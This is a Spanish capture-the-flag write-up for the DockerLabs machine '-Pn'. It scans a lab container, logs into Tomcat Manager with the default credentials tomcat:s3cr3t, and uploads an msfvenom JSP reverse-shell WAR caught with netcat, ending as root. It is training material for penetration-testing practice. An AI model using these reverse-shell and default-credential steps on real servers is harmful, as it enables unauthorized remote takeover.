> For the complete documentation index, see [llms.txt](https://beafn28.gitbook.io/beafn28/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/pn.md).

# -Pn

✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil  📅 Fecha de creación: 02/04/2024

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&amp;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FNObQEiyeRWMHErgtkUyx%2Fimage.png?alt=media&amp;token=057b84ce-8431-4918-ab1b-880b129e9637" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 8080** perteneciente al **servicio HTTP** está abierto por lo que a continuación se indagará más.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p8080 -v 172.17.0.2
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FjER9svK0D9O32hz4detU%2Fimage.png?alt=media&amp;token=6640311a-f4b1-47db-b438-874064bd3659" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web sea un Apache Tomcat.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FTssRMRSqMpY6aHYpRYjp%2Fimage.png?alt=media&amp;token=e7699ca4-d7f5-4aeb-be19-38cf9b0140da" alt=""><figcaption></figcaption></figure>

Vamos a **Manager App** y nos pide unas credenciales. A través de esta [página ](https://book.hacktricks.xyz/es/network-services-pentesting/pentesting-web/tomcat)nos indica las credenciales por defecto y cómo vulnerar esta versión. Las credenciales fueron **tomcat:s3cr3t.**

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FX1GTZ4tQie53gX3jtSzF%2Fimage.png?alt=media&amp;token=9e1a75ae-1531-407a-bdba-44cb8018e671" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Subimos una Reverse Shell.

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.17.0.1 LPORT=443 -f war -o reverse.war
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FXHZhL8RtMdDavEd492yO%2Fimage.png?alt=media&amp;token=ab6ca5db-6024-4003-ae0e-a48e6c00a005" alt=""><figcaption></figcaption></figure>

Nos ponemos en escucha.

```bash
nc -lvnp 443
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FM1pbQRIbLJ65E2qCHWvq%2Fimage.png?alt=media&amp;token=a0006650-f6c3-4ced-bef4-e70efbd5d927" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FZTLhE5U10tf8tgYrSG8W%2Fimage.png?alt=media&amp;token=1a6ad46c-271c-45c8-981a-b4d93ffe0443" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

y  somos **root.**
